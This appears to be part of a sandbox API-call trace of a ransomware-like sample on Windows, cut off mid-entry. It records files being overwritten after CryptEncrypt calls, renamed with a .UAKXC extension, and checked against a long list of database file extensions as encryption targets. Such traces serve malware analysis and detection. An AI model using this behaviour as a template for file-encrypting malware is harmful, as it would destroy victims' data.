1 [0154.552] SetEndOfFile (hFile=0x6f0) returned 1 [0154.552] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.552] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x978, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x978, lpOverlapped=0x0) returned 1 [0154.552] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffff688, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.552] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x978, lpOverlapped=0x0) returned 1 [0154.552] CloseHandle (hObject=0x6f0) returned 1 [0154.555] GetProcessHeap () returned 0xea0000 [0154.555] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0154.555] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0154.555] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0154.555] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0154.556] GetProcessHeap () returned 0xea0000 [0154.556] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0154.556] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5b60 | out: hHeap=0xea0000) returned 1 [0154.556] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3208 | out: hHeap=0xea0000) returned 1 [0154.556] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0154.556] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0154.556] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0154.557] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020 [0154.557] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0154.558] GetLastError () returned 0x0 [0154.558] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=43806141) returned 1 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".4dd") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".4dl") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".accdb") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".accdc") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".accde") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".accdr") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".accdt") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".accft") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".adb") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ade") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".adf") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".adp") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".arc") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ora") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".alf") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ask") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".btr") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".bdf") returned 0x0 [0154.558] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".cat") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".cdb") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ckp") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".cma") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".cpd") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dacpac") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dad") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dadiagrams") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".daschema") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".db") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".db-shm") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".db-wal") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".db3") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dbc") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dbf") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dbs") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dbt") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dbv") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dbx") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dcb") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dct") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dcx") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ddl") returned 0x0 [0154.559] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dlis") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dp1") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dqy") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dsk") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dsn") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dtsx") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".dxl") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".eco") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ecx") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".edb") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".epim") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".exb") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fcd") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fdb") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fic") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fmp") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fmp12") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fmpsl") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fol") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fp3") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fp4") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fp5") returned 0x0 [0154.560] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fp7") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".fpt") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".frm") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".gdb") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".grdb") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".gwi") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".hdb") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".his") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ib") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".idb") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ihx") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".itdb") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".itw") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".jet") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".jtx") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".kdb") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".kexi") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".kexic") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".kexis") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".lgc") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".lwx") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".maf") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".maq") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mar") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mas") returned 0x0 [0154.561] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mav") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mdb") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mdf") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mpd") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mrg") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mud") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".mwb") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".myd") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ndf") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nnt") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nrmlib") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ns2") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ns3") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".ns4") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nsf") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nv") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nv2") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nwdb") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".nyf") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".odb") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".oqy") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".orx") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".owc") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".p96") returned 0x0 [0154.562] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".p97") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".pan") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".pdb") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".pdm") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".pnz") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".qry") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".qvd") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".rbf") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".rctd") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".rod") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".rodx") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".rpd") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".rsd") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sas7bdat") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sbf") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".scx") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sdb") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sdc") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sdf") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sis") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".spq") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sql") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sqlite") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sqlite3") returned 0x0 [0154.563] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".sqlitedb") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".te") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".temx") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".tmd") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".tps") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".trc") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".trm") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".udb") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".udl") returned 0x0 [0154.564] StrStrIW (lpFirst="C:\\MSOCache\\All 